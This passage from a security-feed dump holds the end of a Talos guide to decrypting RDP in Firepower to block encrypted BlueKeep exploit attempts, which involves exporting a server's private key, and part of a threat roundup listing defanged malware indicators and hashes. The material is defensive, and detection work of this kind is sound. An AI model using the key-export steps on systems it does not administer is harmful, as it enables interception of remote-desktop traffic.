configured in \"Remote Desktop Session Host Configuration.\" \n \nOnce the remote desktop host configuration is opened, double-click on any RDP connections and note the certificate used by the RDP server \u2014 we will need this later. \n\n\n[](<https://1.bp.blogspot.com/-OrcGwaTbpw4/XPGCgtSCb0I/AAAAAAAABuQ/9s8-_fjJSYgkJNpG0b8qDied7qKBRQyDwCLcBGAs/s1600/image17.png>)\n\n2\\. Export the RDP certificate and private key \nOpen mmc.exe and navigate to: File -&gt; Add/Remove Snap-in \n\n\n[](<https://1.bp.blogspot.com/-iOfpp6VuZ9A/XPGCmYDCaJI/AAAAAAAABuU/-6drSNDCJIc8Ml0A0n0P_zPDcmQctiP1wCLcBGAs/s1600/image25.png>)\n\nSelect \"Certificates\" on the left and click \"Add.\" \n\n\n[](<https://1.bp.blogspot.com/-6vy6CdDWK8c/XPGCrnShCyI/AAAAAAAABuY/22mSyBXyFBUI9M88cwnR-JejyoflnZ7FgCLcBGAs/s1600/image27.png>)\n\nClick \"Computer account,\" \"Next,\" then \"Finish.\" \nFinally, click \"OK\" to add the certificates snap-in. \n\n\n[](<https://1.bp.blogspot.com/-9Tblm_fAIWk/XPGCxi5wyyI/AAAAAAAABuc/C9POHs4xV8URcZ26cqLzGs5cFsta45H3ACLcBGAs/s1600/image11.png>)\n\n \nNavigate on the left to the Local Computer certificates and locate, on the right, the certificate used by the RDP server we found before in the Remote Desktop Session Host Configuration. \n \nRight click on the certificate and in \"All Tasks\" click on \"Export.\" \n\n\n[](<https://1.bp.blogspot.com/-NmD87EyRtjI/XPGC2TCVxvI/AAAAAAAABuk/r6TX41EhHaUTQ9hj8NHIkK6tLqzPS0L7ACLcBGAs/s1600/image12.png>)\n\nClick \"Yes, export the private key\" in the Certificate Export Wizard then click \"Next.\" \n\n\n[](<https://1.bp.blogspot.com/-jKVJGpJgvS4/XPGC7Eic4KI/AAAAAAAABuo/Z0M-tIOj1L0XRe5E2WfFp2Fkhl_Aik8cQCLcBGAs/s1600/image14.png>)\n\nMake sure \"Personal Information Exchange\" is selected, then click \"Next.\" \n\n\n[](<https://1.bp.blogspot.com/-YtoyR3Koks4/XPGC_25JK9I/AAAAAAAABus/UQ1eTW_2WIorPwG0OPHP40baWCv73n-4gCLcBGAs/s1600/image15.png>)\n\nType in an import password to encrypt the PFX file. Remember this password \u2014 we will need it later. Click \"Next.\" \n\n\n[](<https://1.bp.blogspot.com/-Gg-ErI2obNY/XPGDEc4l_2I/AAAAAAAABu0/Gzaka0xOUvM8YN65kZjNbcxdyXkkEorVgCLcBGAs/s1600/image7.png>)\n\nType in a file name for the PFX file and click \"Next.\" \nFinally, click \"Finish.\" \n \nYou have successfully exported the RDP certificate and private key. \nNow, prepare them for the Firepower appliance. \n \n3\\. Prepare the RDP certificate and private key for Firepower \nFor this step, you will need the OpenSSL tool and the PFX file exported in Step 2 \n(dc1.pfx in this example). \nExtract the RDP certificate from the PFX file: \n\n\n> $ openssl pkcs12 -in dc1.pfx -clcerts -nokeys -out cert.pem \nEnter Import Password:\n\nThe command above will ask for the import password, this is the password we typed in Step 2. \nExtract the RDP private key from the PFX file: \n\n\n> $ openssl pkcs12 -in dc1.pfx -nocerts -out key.pem \nEnter Import Password: \nEnter PEM pass phrase: \nVerifying - Enter PEM pass phrase:\n\nThe above command will ask for the import password again, as well as a PEM password. Remember this private key passphrase, \u2014 we will need it when we add the RDP certificate to Firepower. \n \n4\\. Import the RDP key into Firepower \nAt this point, you should have the RDP cert \"cert.pem,\" as well as the encrypted RDP private key \"key.pem.\" \n\n\n[](<https://1.bp.blogspot.com/-MHwNng3Guow/XPGDQPtQF9I/AAAAAAAABvE/yLIlU6iqmPQ1NhUgym6n7zExBbUln-AjwCLcBGAs/s1600/image18.png>)\n\nNavigate to Objects -&gt; Object Management. \n\n\n[](<https://1.bp.blogspot.com/-737BIiG6eFE/XPGDVFiZXuI/AAAAAAAABvI/XdKDqMlX_Rg_YE5ukydWUVYNAtwwWWcIQCLcBGAs/s1600/image29.png>)\n\n[](<https://1.bp.blogspot.com/-5Xhds4kI33c/XPGDZ1-AOJI/AAAAAAAABvM/nnLHUIGEFh8977FQqOMedJic5lFmjYc6ACLcBGAs/s1600/image13.png>)\n\nSelect \"Add Internal Cert\" on the top right. \n\n\n[](<https://1.bp.blogspot.com/-xozn2VX-d1g/XPGDgilTasI/AAAAAAAABvU/DanGZn502aoImu3R_Oa-e-CqySzJDkB1QCLcBGAs/s1600/image6.png>)\n\nName the certificate (e.g. the server name) and either paste in the \"cert.pem\" or browse to the \"cert.pem\" file in the \"Certificate Data\" section. Do the same for \"key.pem\" in the \"Key\" section. Click the \"Encrypted\" box and type in the PEM password from Step 3. \n \nYou have successfully imported the RDP certificate and private key. Now, create an SSL policy for decryption. \n \n5\\. Create an SSL policy \n\n\n[](<https://1.bp.blogspot.com/-PTJvDoc0oas/XPGDmYDwcHI/AAAAAAAABvY/UYtziMkyR4Il3Bi1vgRUopSGOTxbt6uzQCLcBGAs/s1600/image22.png>)\n\nNavigate to Policies -&gt; SSL \n\n\n[](<https://1.bp.blogspot.com/-EbciLp4GdHg/XPGJjJuqJwI/AAAAAAAAByU/NTyEQIs3CKMLG_2Cr3yIFPkTAAo555pMQCLcBGAs/s1600/image19.png>)\n\nSelect \"New Policy.\" \n\n\n[](<https://1.bp.blogspot.com/-9SeZupUUqpo/XPGDwkbX2RI/AAAAAAAABvg/bdFWDcWsSHAZxiCIpPp1ytiUhf1JhJM7gCLcBGAs/s1600/image26.png>)\n\nEnter a policy name and description with default action \"Do not decrypt.\" \n\n\n[](<https://1.bp.blogspot.com/-zKHOmh20HT4/XPGD11ZsziI/AAAAAAAABvo/lH4oT8ixF8IpQWkzUNkmWsr__70zJQ17gCLcBGAs/s1600/image4.png>)\n\n[](<https://1.bp.blogspot.com/-Rq2NNp0DElc/XPGD6ZJpPNI/AAAAAAAABvw/oapvTEunD1c3FE_uelVTSS43tT3xNMCVACLcBGAs/s1600/image23.png>)\n\nOnce the policy editor has loaded, select \"Add Rule\" (top right). \nName the rule and give it the action \"Decrypt - Known Key.\" Click the \"with\" field and select the certificate you imported earlier in Step 4. \nIf applicable, select \"Source\" and \"Destination\" networks or leave them as \"any.\" \n\n\n[](<https://1.bp.blogspot.com/-o3tYMPniDHQ/XPGD_YWnznI/AAAAAAAABv0/_UV2zkWctKQaqMW8juIXLZThwiBR3nQKgCLcBGAs/s1600/image5.png>)\n\nClick on the \"Ports\" tab and input the TCP port 3389 (if appropriate for your environment) under \"Selected Destination Ports\" and click \"Add.\" \n\n\n[](<https://1.bp.blogspot.com/-bWS27zLrW2c/XPGEFADvqqI/AAAAAAAABv8/GKif5fkBnNwAxjhmUv7ngx4-AcEn68JXACLcBGAs/s1600/image20.png>)\n\nUnder the \"Logging\" tab, enable logging at the end of the connection if desired. \nClick \"Add\" and then \"Save\" to save the rule. \nAdditional SSL documentation is available [here](<https://www.cisco.com/c/en/us/support/docs/security/firesight-management-center/200202-Configuration-of-an-SSL-Inspection-Polic.html>). \n \n6\\. Enable the Intrusion Prevention Rule for BlueKeep \n\n\n[](<https://1.bp.blogspot.com/-LlSxRX1ROIk/XPGEK5GEavI/AAAAAAAABwI/9YHj6q2Pxmga4vycAJJYn7GAedTHZV9ugCLcBGAs/s1600/image2.png>)\n\n[](<https://1.bp.blogspot.com/-bWS27zLrW2c/XPGEFADvqqI/AAAAAAAABv8/Y9pAQQ5_pLYZhR8MTnlgEBh7lA1fvJwGQCEwYBhgL/s1600/image20.png>)\n\nNavigate to Policies -&gt; Access Control -&gt; Intrusion Prevention. \nEdit the desired Intrusion Policy. \nFilter for Snort ID 50137 \"OS-WINDOWS Microsoft Windows RDP MS_T120 channel bind attempt.\" \nClick the checkbox and select Rule State -&gt; Drop and Generate Events. \n\n\n[](<https://1.bp.blogspot.com/-JyB8SvRTdVQ/XPGES-_IbrI/AAAAAAAABwQ/7GoB9cdaV4E61KDheKenuI5K9zLKcTyOQCLcBGAs/s1600/image28.png>)\n\nClick \"Policy Information\" and commit changes. \n \n7\\. Configure the Access Control Policy \nNavigate to Policies -&gt; Access Control and edit the relevant Access Control Policy. \n\n\n[](<https://1.bp.blogspot.com/-09-e7oCj7UY/XPGEb8oVZSI/AAAAAAAABwc/RACXNzEYjqoUQYtUYXPnS0yJANwZ5vzxACLcBGAs/s1600/image8.png>)\n\nUnder the \"Advanced\" tab, edit \"SSL Policy Settings.\" \n\n\n[](<https://1.bp.blogspot.com/-gAHAXr13LtA/XPGEgIodgkI/AAAAAAAABwg/nIlCdE44Drwo4dWJ2EeOZ-yUhJfR-fKogCLcBGAs/s1600/image16.png>)\n\nSelect the SSL Policy we created in Step 5 and click \"OK.\" \n\n\n[](<https://1.bp.blogspot.com/-f9o105giNGs/XPGEkbBLWrI/AAAAAAAABwo/v4_AGE0Qwa4LBVBQI5qBbWK4TJswbTt5QCLcBGAs/s1600/image3.png>)\n\nEnsure that your Intrusion Prevention Policy is selected under \"Intrusion Policy used before Access Control rule is determined\" in the \"Network Analysis and Intrusion Policies\" section of the \"Advanced\" tab. \n\n\n[](<https://1.bp.blogspot.com/-J9TRlgZX4lI/XPGEpF3wdUI/AAAAAAAABws/nj8MEUjLPu4OvcXdZelYHwqo3DvQmCmJQCLcBGAs/s1600/image9.png>)\n\nUnder the \"Rules\" tab of your Access Control Policy, ensure you have an appropriate Intrusion Policy set for any \"Allow\" rules. \n\n\n[](<https://1.bp.blogspot.com/-w53pXDHvzvk/XPGEumRrESI/AAAAAAAABw0/Lh3enE8tsDodBNRSFmiVPsSnSnPSvqwRgCLcBGAs/s1600/image24.png>)\n\nIf appropriate, enable the Intrusion Prevention Policy for your Default Action, as well. \n\n\n[](<https://1.bp.blogspot.com/-MqR1fj5mxzA/XPGEy0njTNI/AAAAAAAABw8/JydxpassOlIBcnGo0S9iA6s-b5AuO38YQCLcBGAs/s1600/image10.png>)\n\nSave and deploy changes. \nVerify RDP connectivity and functionality. \n\n\n### Encrypted Exploit in Action\n\nLet's start this by walking through what happens when the exploit is attempted on an unpatched, unprotected Windows 7 system. \n\n\n[](<https://1.bp.blogspot.com/-ARFWUNmGrMc/XPGE62EdDbI/AAAAAAAABxE/GI0opDS12m8TeExfQhXkfw-Nxwn4bHWmwCLcBGAs/s1600/Windows7_Exploit.gif>)\n\nAs you can see, when the exploit is launched, it results in a denial of service on the system, as expected. Now we will demonstrate the process once you have enabled the SSL decryption for RDP, described in this blog, and leverage the detection capabilities of Firepower. \n\n\n[](<https://1.bp.blogspot.com/-J7si3mTj-u8/XPGGfJV3TfI/AAAAAAAABx8/gmqJq66xtCowaWDhCxhdbXZUXBIstZVhgCLcBGAs/s1600/Windows7_NGFW.gif>)\n\nIn this instance, no denial of service occurs and the system is unaffected, despite the attack being encrypted. Below is a screen capture showing SID 50137 alerting and dropping the encrypted BlueKeep exploit in Firepower. \n\n\n[](<https://1.bp.blogspot.com/-FhxZ1_KM84o/XPGFVX3wU-I/AAAAAAAABxk/scVUjqEJKAwintO-9fdopzRl-3jsT0MQQCLcBGAs/s1600/image21.png>)\n\n[](<https://1.bp.blogspot.com/-GVnNI_kekaI/XPGFaqhDnCI/AAAAAAAABxo/suaB4NhQMzoa9N1rnFxUesX4VJHl4MdlwCLcBGAs/s1600/image1.png>)\n\n### Conclusion\n\nOver the last several years we have seen several high profile vulnerabilities affecting services associated with various Windows services. Some, if not all, of these services should not be exposed to the internet. To reduce external exposure organizations need to take additional steps to ensure that services like RDP and SMB are not exposed unless explicitly required, but does not eliminate the need for patching. This is yet another example of why patching is one of the core fundamental concepts in information security. Vulnerabilities this severe appear periodically, and organizations need to be prepared to respond in a variety of different ways. Patching takes time and making sure that you have detection and prevention in place can require varying levels of difficulty. In this particular example, in order to get a higher level of visibility, SSL decryption is required for more thorough protections. \n \nAs encryption becomes more ingrained in the internet and more applications take advantage of it, these types of steps are going to become more common. Adversaries are always going to look for ways to evade any type of detection and using encryption is a great way to evade some of these technologies. Regardless, Cisco Talos will always be looking at the ways adversaries are operating and developing new and clever techniques to defeat them. \n \n", "modified": "2019-06-10T09:37:34", "published": "2019-06-10T09:37:34", "id": "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/OVRG-ZW_vgo/firepower-encrypted-rdp-detection.html", "type": "talosblog", "title": "Using Firepower to defend against encrypted RDP attacks like BlueKeep", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-07T21:29:19", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)\n\nToday, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 31 and Feb. 7. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>). \n \n \nFor each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>)that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness. \nThe most prevalent threats highlighted in this roundup are: \n \nThreat Name | Type | Description \n---|---|--- \nDoc.Downloader.Emotet-7572697-1 | Downloader | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails. \nWin.Malware.Nymaim-7569940-0 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains to connect to additional payloads. \nWin.Dropper.Genkryptik-7572204-0 | Dropper | Genkryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, including collecting system information, downloading/uploading files and dropping additional samples. \nWin.Worm.Gh0stRAT-7571319-1 | Worm | Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks. \nWin.Ransomware.Cerber-7571364-0 | Ransomware | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension \".cerber,\" although, in more recent campaigns, other file extensions are used. \nWin.Malware.Kovter-7571676-0 | Malware | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries that store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware. \nWin.Dropper.TrickBot-7577793-0 | Dropper | Trickbot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts. \nWin.Packed.Zusy-7572206-0 | Packed | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as \"explorer.exe\" and \"winver.exe.\" When the user accesses a banking website, it displays a form to trick the user into submitting personal information. \n \n* * *\n\n## Threat Breakdown\n\n### Doc.Downloader.Emotet-7572697-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Type ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: Start ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ErrorControl ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ImagePath ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: DisplayName ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: WOW64 ` | 24 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MEXICOGUID \nValue Name: ObjectName ` | 24 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 24 \n`Global\\M98B68E3C` | 24 \n`Global\\IC019706B` | 1 \n`Global\\MC019706B` | 1 \n`Global\\8032E0D6835932960` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`169[.]254[.]255[.]255` | 1 \n`198[.]58[.]114[.]91` | 1 \n`93[.]189[.]42[.]146` | 1 \n`5[.]2[.]75[.]167` | 1 \n`104[.]236[.]28[.]47` | 25 \n`133[.]130[.]97[.]61` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`252[.]5[.]55[.]69[.]spam[.]abuse[.]ch` | 1 \n`252[.]5[.]55[.]69[.]spam[.]dnsbl[.]sorbs[.]net` | 1 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 1 \n`252[.]5[.]55[.]69[.]b[.]barracudacentral[.]org` | 1 \n`chonhangchuan[.]net` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\msgchannelb.exe` | 1 \n`%SystemRoot%\\SysWOW64\\msgchannela.exe` | 1 \n`%APPDATA%\\windirect\\settings.ini` | 1 \n`%HOMEPATH%\\532.exe` | 25 \n`%ProgramData%\\4Cs14qtyjWERecs90J.exe` | 1 \n`%ProgramData%\\8MoBR9ygNour.exe` | 1 \n \n#### File Hashes\n\n` 007fc647ae0f8639902f3c6ebae36e993f8b3fc08297118da2feb154df40740f 018ed3d6c7e96cb9010633c08acf5ddce16fccdaae299dfcf7d87e79eda6bd39 07e176a1c503e7a072f8a5f31b0871e961aae07fad606a3c3838b856442487eb 0860e692cd7444b9a85df9d15c46bfd707454cc8c1267d4de56260bf3d6cffa2 0de64e1664365414c3c529bb8dab306b995b61e34cb4d58b0d07ed6d716c715f 0f3358b0b2b1c8e74a38319daad492d7adcf2d130cc8dbd439c684c9c9e5153c 1a8fe6dd6c3cdf567f41bb6977a88c892473797acde8694ced39139640715bcb 1e835f85dc0631028c5bd4aaa75b166b8d9714642876339a4a86ef40973b6ace 220c8e32a0f771b62f01279391d3f93a40d3ce389b45d4ffff0699188792ea23 2cdc0e42a36a681175b5b3eeef29037709e43e7123aabc1f4bcee86fa06a4896 375eea419ae94249961ad625ce1dcd3502860bc1e6e396afb4570c735bf43803 3b89f52ac5385d9f8733f4ec6f3bb7721df689a5dd1c197bfcd3feffb9749dd4 62a2e813d32c179dfe3a565558a48fb0c5b9820b337458028a5232c5de9eaf42 8075bc50d7e867f0a255b9826f5c6bc35a0c82f1408ad3502b499055549c8e1f 85fbf7b289eaa61b99bcbe56e804abf3083cb14448b1ca8a9b20896989f27e9c 8f2d6be36b63d09c277df0cdf4788ed3c057cfaaa7d84e06e2e79ea9998d3dd6 93f972acfdb179a6ecdb35d1ff2602a197aaacb5039572bf5600ebc8186618c2 a892730b092202036e00e25cbdbd3464711db05ffa30c92d99eabeb8be5b6e1e b1ec2a137410f27af98fba5d9da34af0583feead57d2328aa98ecc0cca490081 b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a b6160c8601befc7f62c4e3b274430b710c05e596d69d2c34e9710597336b35cb c00797ecdd835144cf9183edd42e45c2e4b117a4d1fafd670f9c2a4f464eba9a c50e5289d3bebdab1ba9b8d101d47596c8cc72e2616df6690189b1e99ce5268f d00f4a6e014ec6f602d2dd0a99fc10084f111ccae25bde16dd4ee05c204ba7c1 d558d946a685c29cfab63009dba1b91c2a870a2e623d028d0a70b96a9cf12d6f `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Ih9lInK-sJs/Xj2hP1R2uDI/AAAAAAAADPU/AqD13Tamj9YQeUf7GUk4np1Vv0KP7HL6ACLcBGAsYHQ/s1600/d558d946a685c29cfab63009dba1b91c2a870a2e623d028d0a70b96a9cf12d6f_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-GAO1E13xGCg/Xj2hVYzr7fI/AAAAAAAADPY/grXtbnJjUrwCtrXJX3GlSVEOiUzbcmU6gCLcBGAsYHQ/s1600/b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-62VBZhZbdPg/Xj2hY6PVnFI/AAAAAAAADPc/D7wgl4vLMc0QUN6GLm3kp7mUPzM074n5gCLcBGAsYHQ/s1600/b4b51782bfcebdf89072029a92244cd4bf53dfebbeb9f125c3bd721b9bc7855a_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7569940-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 18 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 18 \nMutexes | Occurrences \n---|--- \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 18 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 18 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 18 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 18 \n`Local\\{306BA354-8414-ABA3-77E9-7A7F347C71F4}` | 18 \n`Local\\{F58B5142-BC49-9662-B172-EA3D10CAA47A}` | 18 \n`Local\\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}` | 18 \n`Local\\{B888AC68-15DA-9362-2153-60CCDE3753D5}` | 18 \n`Local\\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}` | 18 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`wfbimtogx[.]pw` | 1 \n`icbwujv[.]pw` | 1 \n`lcque[.]com` | 1 \n`odouzwyaw[.]in` | 1 \n`jknqnrpjgdgo[.]in` | 1 \n`hgbcdxmjm[.]net` | 1 \n`mnhtemsicp[.]in` | 1 \n`hcozsjtscf[.]pw` | 1 \n`vkerdawjo[.]in` | 1 \n`upkbwykuchtb[.]net` | 1 \n`adulvwixq[.]in` | 1 \n`rnhrlupcs[.]com` | 1 \n`ohxozfvoxg[.]com` | 1 \n`gphvrtnt[.]in` | 1 \n`zvsrc[.]pw` | 1 \n`vlddqnhkoxei[.]com` | 18 \n`elnqzs[.]net` | 18 \n`sxrzdfil[.]net` | 18 \n`papuzvj[.]net` | 18 \n`ffincb[.]com` | 18 \n`gnmhtaguavi[.]com` | 18 \n`pvwdgii[.]pw` | 18 \n`llrgmivfnqee[.]pw` | 18 \n`nknbtl[.]pw` | 18 \n`eeiheou[.]in` | 18 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\fro.dfx` | 18 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 18 \n`%ProgramData%\\ph` | 18 \n`%ProgramData%\\ph\\fktiipx.ftf` | 18 \n`%TEMP%\\gocf.ksv` | 18 \n`%ProgramData%\\<random, matching '[a-z0-9]{3,7}'>` | 18 \n`%APPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 18 \n`%LOCALAPPDATA%\\<random, matching '[a-z0-9]{3,7}'>` | 18 \n \n#### File Hashes\n\n` 0b4181b933a8d0d350a9df085ac98a27350d49cd8bdded69b0153d5ec6adda21 1224eeb04e14029eec5a711ea7b973954f272851d6f4b4d02fecd4b40ebbd3e5 134d474322c25989e1aa2b6c807473d8a099b06716afcc1904dcadadd74e14d9 20c0747e95843e9c09806f7ef954cfd35c94e2b67907617a3bc0299e00026198 3e5ad8831233e388f485cd6b99c4d6687f1d6e38623bf48d2270919aa4d9e000 59445c64816f7513250a3b49cf5a513c842098be8f3730b33056705ef5c1d624 80cb190082bd6b3e0ec0657a1fd76ae5a53e434e19363e93f6ae999135f99594 89adc81706b7dd975f63be1f1269f63add24f292f5c0d93c92b4b411eb6a9fbc 93fbb35c72feccabccdf4d903d10be4bf0090141cef91dfb0e34ab021138c4ba 9dae9cc1db48a1f31f54b1430f72b5a275c5b36afe274510ff25464d6f7f85a2 b43e324ed527c2d52660e31595b5f61c2151808d351ed80fc853e1345bbf6b5c b828ad714533bdca9fbfd96e14bc8fdcb30f1687bade3025b6b1ddfcf46fb793 c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66 db35f03ab4fb2eff6dfa485e85433f4a61016fc2e18b17793e8e0b6c8afe5585 e3795c261bb84415e76175eee1b7d07aa335b690952116b84cc297a1bbd83001 e71d8f0a51ecf0d078930da518e6b7e8c4c001d42200e0e6965691e8fe1549ea ec3b170ebe1a9a524091d5c46da9080f07a409fb11c51a841b695951f14062ba f84a9b3bcfadbeca17b80922487f7632df91f8a1a4adfde04924c7b9f9b54cd0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-95XWyiFNwuk/Xj2jlUHR4dI/AAAAAAAADPw/mDpgE1125ywxbtkLF9gM4EUBeXmFFNyPACLcBGAsYHQ/s1600/c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-l2tbEnYFJzk/Xj2jogAD1GI/AAAAAAAADP0/oIx2X4f6_fwTUY6S7aZpOl1iC-Wf06GaQCLcBGAsYHQ/s1600/c90c69db988bc69ec5a6e82e0b71f006d3ad1309bb8f722a8361fdf2cd573f66_tg.png>)\n\n \n\n\n \n\n\n### Win.Dropper.Genkryptik-7572204-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 10 \n`<HKCU>\\SOFTWARE\\WINRAR ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: Startup key ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003E9 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000001F5 \nValue Name: F ` | 2 \n`<HKLM>\\SAM\\SAM\\DOMAINS\\ACCOUNT\\USERS\\000003EC \nValue Name: F ` | 2 \n`<HKCU>\\SOFTWARE\\WINRAR \nValue Name: HWID ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: IpgKLBFV ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: enchantsf ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 1 \n`Global\\{fb001475-4304-414b-b3c4-440bd0301e5f}` | 1 \n`Global\\{26af037d-c127-451a-807e-f8d8fcf61bd9}` | 1 \n`Global\\{a7ae8b72-b465-4a93-b481-e821d4114233}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 1 \n`172[.]217[.]10[.]238` | 7 \n`172[.]217[.]7[.]14` | 2 \n`172[.]217[.]164[.]174` | 1 \n`172[.]217[.]7[.]1` | 2 \n`172[.]217[.]10[.]225` | 7 \n`198[.]251[.]81[.]30` | 1 \n`88[.]233[.]219[.]188` | 1 \n`185[.]61[.]154[.]20` | 1 \n`193[.]142[.]59[.]98` | 1 \n`79[.]134[.]225[.]125` | 1 \n`79[.]134[.]225[.]5` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`parking[.]namesilo[.]com` | 1 \n`labosan[.]hr` | 1 \n`doc-14-b8-docs[.]googleusercontent[.]com` | 1 \n`doc-0s-14-docs[.]googleusercontent[.]com` | 1 \n`doc-0s-5o-docs[.]googleusercontent[.]com` | 1 \n`doc-0c-80-docs[.]googleusercontent[.]com` | 1 \n`steel500[.]duckdns[.]org` | 1 \n`doc-08-bs-docs[.]googleusercontent[.]com` | 1 